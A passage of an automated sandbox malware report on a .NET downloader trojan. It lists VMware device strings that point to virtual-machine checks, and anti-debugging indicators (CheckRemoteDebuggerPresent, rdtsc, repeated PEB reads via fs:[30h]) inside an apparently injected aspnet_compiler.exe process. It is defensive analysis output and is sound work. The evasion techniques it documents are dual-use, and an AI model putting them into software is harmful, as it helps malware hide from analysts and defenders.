      Source: explorer.exe, 00000002.00000000.388144851.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000002.00000000.323177596.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
      Source: explorer.exe, 00000002.00000000.329224317.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.331938122.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
      Source: explorer.exe, 00000002.00000000.389334896.000000000856B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000002.00000000.388144851.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000

      Anti Debugging

      barindex
      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeCode function: 0_2_00AA2AC8 CheckRemoteDebuggerPresent,0_2_00AA2AC8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01265BA5 rdtsc 1_2_01265BA5
      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.346.3836.25977.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01199100 mov eax, dword ptr fs:[00000030h]1_2_01199100
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01199100 mov eax, dword ptr fs:[00000030h]1_2_01199100
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01199100 mov eax, dword ptr fs:[00000030h]1_2_01199100
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C513A mov eax, dword ptr fs:[00000030h]1_2_011C513A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C513A mov eax, dword ptr fs:[00000030h]1_2_011C513A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B4120 mov eax, dword ptr fs:[00000030h]1_2_011B4120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B4120 mov eax, dword ptr fs:[00000030h]1_2_011B4120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B4120 mov eax, dword ptr fs:[00000030h]1_2_011B4120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B4120 mov eax, dword ptr fs:[00000030h]1_2_011B4120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B4120 mov ecx, dword ptr fs:[00000030h]1_2_011B4120
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BB944 mov eax, dword ptr fs:[00000030h]1_2_011BB944
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BB944 mov eax, dword ptr fs:[00000030h]1_2_011BB944
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119B171 mov eax, dword ptr fs:[00000030h]1_2_0119B171
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119B171 mov eax, dword ptr fs:[00000030h]1_2_0119B171
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119C962 mov eax, dword ptr fs:[00000030h]1_2_0119C962
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012169A6 mov eax, dword ptr fs:[00000030h]1_2_012169A6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C2990 mov eax, dword ptr fs:[00000030h]1_2_011C2990
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BC182 mov eax, dword ptr fs:[00000030h]1_2_011BC182
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CA185 mov eax, dword ptr fs:[00000030h]1_2_011CA185
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012151BE mov eax, dword ptr fs:[00000030h]1_2_012151BE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012151BE mov eax, dword ptr fs:[00000030h]1_2_012151BE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012151BE mov eax, dword ptr fs:[00000030h]1_2_012151BE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012151BE mov eax, dword ptr fs:[00000030h]1_2_012151BE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C61A0 mov eax, dword ptr fs:[00000030h]1_2_011C61A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C61A0 mov eax, dword ptr fs:[00000030h]1_2_011C61A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012241E8 mov eax, dword ptr fs:[00000030h]1_2_012241E8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119B1E1 mov eax, dword ptr fs:[00000030h]1_2_0119B1E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119B1E1 mov eax, dword ptr fs:[00000030h]1_2_0119B1E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119B1E1 mov eax, dword ptr fs:[00000030h]1_2_0119B1E1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AB02A mov eax, dword ptr fs:[00000030h]1_2_011AB02A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AB02A mov eax, dword ptr fs:[00000030h]1_2_011AB02A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AB02A mov eax, dword ptr fs:[00000030h]1_2_011AB02A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AB02A mov eax, dword ptr fs:[00000030h]1_2_011AB02A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C002D mov eax, dword ptr fs:[00000030h]1_2_011C002D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C002D mov eax, dword ptr fs:[00000030h]1_2_011C002D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C002D mov eax, dword ptr fs:[00000030h]1_2_011C002D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C002D mov eax, dword ptr fs:[00000030h]1_2_011C002D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C002D mov eax, dword ptr fs:[00000030h]1_2_011C002D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01264015 mov eax, dword ptr fs:[00000030h]1_2_01264015
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01264015 mov eax, dword ptr fs:[00000030h]1_2_01264015
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01217016 mov eax, dword ptr fs:[00000030h]1_2_01217016
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01217016 mov eax, dword ptr fs:[00000030h]1_2_01217016
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01217016 mov eax, dword ptr fs:[00000030h]1_2_01217016
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B0050 mov eax, dword ptr fs:[00000030h]1_2_011B0050
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B0050 mov eax, dword ptr fs:[00000030h]1_2_011B0050
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01261074 mov eax, dword ptr fs:[00000030h]1_2_01261074
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01252073 mov eax, dword ptr fs:[00000030h]1_2_01252073
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01199080 mov eax, dword ptr fs:[00000030h]1_2_01199080
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CF0BF mov ecx, dword ptr fs:[00000030h]1_2_011CF0BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CF0BF mov eax, dword ptr fs:[00000030h]1_2_011CF0BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CF0BF mov eax, dword ptr fs:[00000030h]1_2_011CF0BF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01213884 mov eax, dword ptr fs:[00000030h]1_2_01213884
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01213884 mov eax, dword ptr fs:[00000030h]1_2_01213884
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D90AF mov eax, dword ptr fs:[00000030h]1_2_011D90AF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C20A0 mov eax, dword ptr fs:[00000030h]1_2_011C20A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C20A0 mov eax, dword ptr fs:[00000030h]1_2_011C20A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C20A0 mov eax, dword ptr fs:[00000030h]1_2_011C20A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C20A0 mov eax, dword ptr fs:[00000030h]1_2_011C20A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C20A0 mov eax, dword ptr fs:[00000030h]1_2_011C20A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C20A0 mov eax, dword ptr fs:[00000030h]1_2_011C20A0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0122B8D0 mov eax, dword ptr fs:[00000030h]1_2_0122B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0122B8D0 mov ecx, dword ptr fs:[00000030h]1_2_0122B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0122B8D0 mov eax, dword ptr fs:[00000030h]1_2_0122B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0122B8D0 mov eax, dword ptr fs:[00000030h]1_2_0122B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0122B8D0 mov eax, dword ptr fs:[00000030h]1_2_0122B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0122B8D0 mov eax, dword ptr fs:[00000030h]1_2_0122B8D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011958EC mov eax, dword ptr fs:[00000030h]1_2_011958EC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125131B mov eax, dword ptr fs:[00000030h]1_2_0125131B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119F358 mov eax, dword ptr fs:[00000030h]1_2_0119F358
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119DB40 mov eax, dword ptr fs:[00000030h]1_2_0119DB40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C3B7A mov eax, dword ptr fs:[00000030h]1_2_011C3B7A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C3B7A mov eax, dword ptr fs:[00000030h]1_2_011C3B7A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119DB60 mov ecx, dword ptr fs:[00000030h]1_2_0119DB60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01268B58 mov eax, dword ptr fs:[00000030h]1_2_01268B58
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01265BA5 mov eax, dword ptr fs:[00000030h]1_2_01265BA5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C2397 mov eax, dword ptr fs:[00000030h]1_2_011C2397
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CB390 mov eax, dword ptr fs:[00000030h]1_2_011CB390
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A1B8F mov eax, dword ptr fs:[00000030h]1_2_011A1B8F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A1B8F mov eax, dword ptr fs:[00000030h]1_2_011A1B8F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0124D380 mov ecx, dword ptr fs:[00000030h]1_2_0124D380
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125138A mov eax, dword ptr fs:[00000030h]1_2_0125138A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C4BAD mov eax, dword ptr fs:[00000030h]1_2_011C4BAD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C4BAD mov eax, dword ptr fs:[00000030h]1_2_011C4BAD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C4BAD mov eax, dword ptr fs:[00000030h]1_2_011C4BAD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012153CA mov eax, dword ptr fs:[00000030h]1_2_012153CA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012153CA mov eax, dword ptr fs:[00000030h]1_2_012153CA
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BDBE9 mov eax, dword ptr fs:[00000030h]1_2_011BDBE9
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C03E2 mov eax, dword ptr fs:[00000030h]1_2_011C03E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C03E2 mov eax, dword ptr fs:[00000030h]1_2_011C03E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C03E2 mov eax, dword ptr fs:[00000030h]1_2_011C03E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C03E2 mov eax, dword ptr fs:[00000030h]1_2_011C03E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C03E2 mov eax, dword ptr fs:[00000030h]1_2_011C03E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C03E2 mov eax, dword ptr fs:[00000030h]1_2_011C03E2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B3A1C mov eax, dword ptr fs:[00000030h]1_2_011B3A1C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01195210 mov eax, dword ptr fs:[00000030h]1_2_01195210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01195210 mov ecx, dword ptr fs:[00000030h]1_2_01195210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01195210 mov eax, dword ptr fs:[00000030h]1_2_01195210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01195210 mov eax, dword ptr fs:[00000030h]1_2_01195210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119AA16 mov eax, dword ptr fs:[00000030h]1_2_0119AA16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119AA16 mov eax, dword ptr fs:[00000030h]1_2_0119AA16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A8A0A mov eax, dword ptr fs:[00000030h]1_2_011A8A0A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D4A2C mov eax, dword ptr fs:[00000030h]1_2_011D4A2C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D4A2C mov eax, dword ptr fs:[00000030h]1_2_011D4A2C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125AA16 mov eax, dword ptr fs:[00000030h]1_2_0125AA16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125AA16 mov eax, dword ptr fs:[00000030h]1_2_0125AA16
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0124B260 mov eax, dword ptr fs:[00000030h]1_2_0124B260
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0124B260 mov eax, dword ptr fs:[00000030h]1_2_0124B260
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01268A62 mov eax, dword ptr fs:[00000030h]1_2_01268A62
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01199240 mov eax, dword ptr fs:[00000030h]1_2_01199240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01199240 mov eax, dword ptr fs:[00000030h]1_2_01199240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01199240 mov eax, dword ptr fs:[00000030h]1_2_01199240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01199240 mov eax, dword ptr fs:[00000030h]1_2_01199240
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D927A mov eax, dword ptr fs:[00000030h]1_2_011D927A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125EA55 mov eax, dword ptr fs:[00000030h]1_2_0125EA55
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01224257 mov eax, dword ptr fs:[00000030h]1_2_01224257
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CD294 mov eax, dword ptr fs:[00000030h]1_2_011CD294
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CD294 mov eax, dword ptr fs:[00000030h]1_2_011CD294
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AAAB0 mov eax, dword ptr fs:[00000030h]1_2_011AAAB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011AAAB0 mov eax, dword ptr fs:[00000030h]1_2_011AAAB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CFAB0 mov eax, dword ptr fs:[00000030h]1_2_011CFAB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011952A5 mov eax, dword ptr fs:[00000030h]1_2_011952A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011952A5 mov eax, dword ptr fs:[00000030h]1_2_011952A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011952A5 mov eax, dword ptr fs:[00000030h]1_2_011952A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011952A5 mov eax, dword ptr fs:[00000030h]1_2_011952A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011952A5 mov eax, dword ptr fs:[00000030h]1_2_011952A5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C2ACB mov eax, dword ptr fs:[00000030h]1_2_011C2ACB
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C2AE4 mov eax, dword ptr fs:[00000030h]1_2_011C2AE4
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01268D34 mov eax, dword ptr fs:[00000030h]1_2_01268D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0121A537 mov eax, dword ptr fs:[00000030h]1_2_0121A537
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0125E539 mov eax, dword ptr fs:[00000030h]1_2_0125E539
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C4D3B mov eax, dword ptr fs:[00000030h]1_2_011C4D3B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C4D3B mov eax, dword ptr fs:[00000030h]1_2_011C4D3B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011C4D3B mov eax, dword ptr fs:[00000030h]1_2_011C4D3B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_0119AD30 mov eax, dword ptr fs:[00000030h]1_2_0119AD30
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011A3D34 mov eax, dword ptr fs:[00000030h]1_2_011A3D34
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011B7D50 mov eax, dword ptr fs:[00000030h]1_2_011B7D50
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011D3D43 mov eax, dword ptr fs:[00000030h]1_2_011D3D43
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01213540 mov eax, dword ptr fs:[00000030h]1_2_01213540
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BC577 mov eax, dword ptr fs:[00000030h]1_2_011BC577
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011BC577 mov eax, dword ptr fs:[00000030h]1_2_011BC577
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CFD9B mov eax, dword ptr fs:[00000030h]1_2_011CFD9B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_011CFD9B mov eax, dword ptr fs:[00000030h]1_2_011CFD9B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012605AC mov eax, dword ptr fs:[00000030h]1_2_012605AC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_012605AC mov eax, dword ptr fs:[00000030h]1_2_012605AC
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01192D8A mov eax, dword ptr fs:[00000030h]1_2_01192D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01192D8A mov eax, dword ptr fs:[00000030h]1_2_01192D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01192D8A mov eax, dword ptr fs:[00000030h]1_2_01192D8A
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 1_2_01192D8A mov eax, dword ptr fs:[00000030h]1_2_01192D8A
